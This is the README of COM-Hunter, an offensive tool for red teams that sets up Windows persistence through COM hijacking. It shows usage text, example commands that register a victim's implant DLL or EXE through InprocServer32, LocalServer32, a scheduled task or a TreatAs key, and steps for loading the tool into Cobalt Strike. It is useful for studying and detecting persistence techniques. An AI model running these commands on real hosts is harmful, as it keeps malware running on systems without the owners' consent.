COM Hijacking VOODOO
COM-Hunter is a COM Hijacking persistence tool.
Available in both a .NET version and a BOF variant fully compatible with Cobalt Strike.
The following list explains the available modes:
- Search Mode: Searches for CLSIDs based on
LocalServer32,InprocServer32, and registry entries under bothHKLMandHKCU. - Classic Persist Mode: Performs classic COM hijacking persistence using
LocalServer32orInprocServer32. - Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using
LocalServer32orInprocServer32. - TreatAs Mode: Performs COM hijacking persistence via the TreatAs registry key and a fake (forwardable) CLSID using
LocalServer32orInprocServer32. - Remove Mode: Removes persistence mechanisms that rely on
LocalServer32,InprocServer32, and related registry entries under bothHKLMandHKCU.
If you find any bugs, don’t hesitate to report them. Your feedback is valuable in improving the quality of this project!
The authors and contributors of this project are not liable for any illegal use of the tool. It is intended for educational purposes only. Users are responsible for ensuring lawful usage.
This project created with ❤️ by @nickvourd && @S1ckB0y1337.
Special thanks to my friend Marios Gyftos for his invaluable assistance during the beta testing phase of this tool.
Inspired by the RTO course from @zeropointsecltd.
BOF implementation inspired by Lefteris Panos and his awesome project, RegPersist.
The base.c and bofdefs.h files are direct copies from TrustedSec's CS-Situational-Awareness-BOF project.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
remove Remove Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Remove Mode:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Remove DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Remove DLL implementations in HKLM and HKCU
-l, --localserver32 Remove EXE implementations in HKLM and HKCU
-m, --machine Remove DLL and EXE implementations in HKLM
-u, --user Remove DLL and EXE implementations in HKCU
ℹ️ Search DLL and EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Search EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Advanced search EXE implementations in HKLM:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Search EXE and DLL implementations in HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Perform classic persistence using DLL implementation:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Perform classic persistence using EXE implementation:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Perform persistence via Task Scheduler using DLL implementation:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Perform persistence via the TreatAs registry key and a fake (forwardable) CLSID using DLL implementation:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ Remove DLL implementation persistence in HKCU using:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ Required MinGW-w64 toolchain (x86_64-w64-mingw32-gcc and i686-w64-mingw32-gcc)
ℹ️ Compile the BOF objects for both architectures:
./make_all.sh
This will:
- Create the
com_hunter_*directories. - Compile
com_hunter_*.x64.oandcom_hunter_*.x86.o. - Move both object files into the
com_hunter_*/directories.
ℹ️ After compiling the BOF modules, simply load com_hunter_bof.cna into Cobalt Strike.
ℹ️ To clean build artifacts, go into evary src directory and execute:
make clean
- Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec
- Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS
- Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
- COM Objects Hijacking by Virus Total
- CS-Remote-OPs-BOF GitHub Repository by TrustedSec
- A Developer's Introduction to Beacon Object Files by TrustedSec
- BOF Development & Tradecraft Course by Zeropoint Security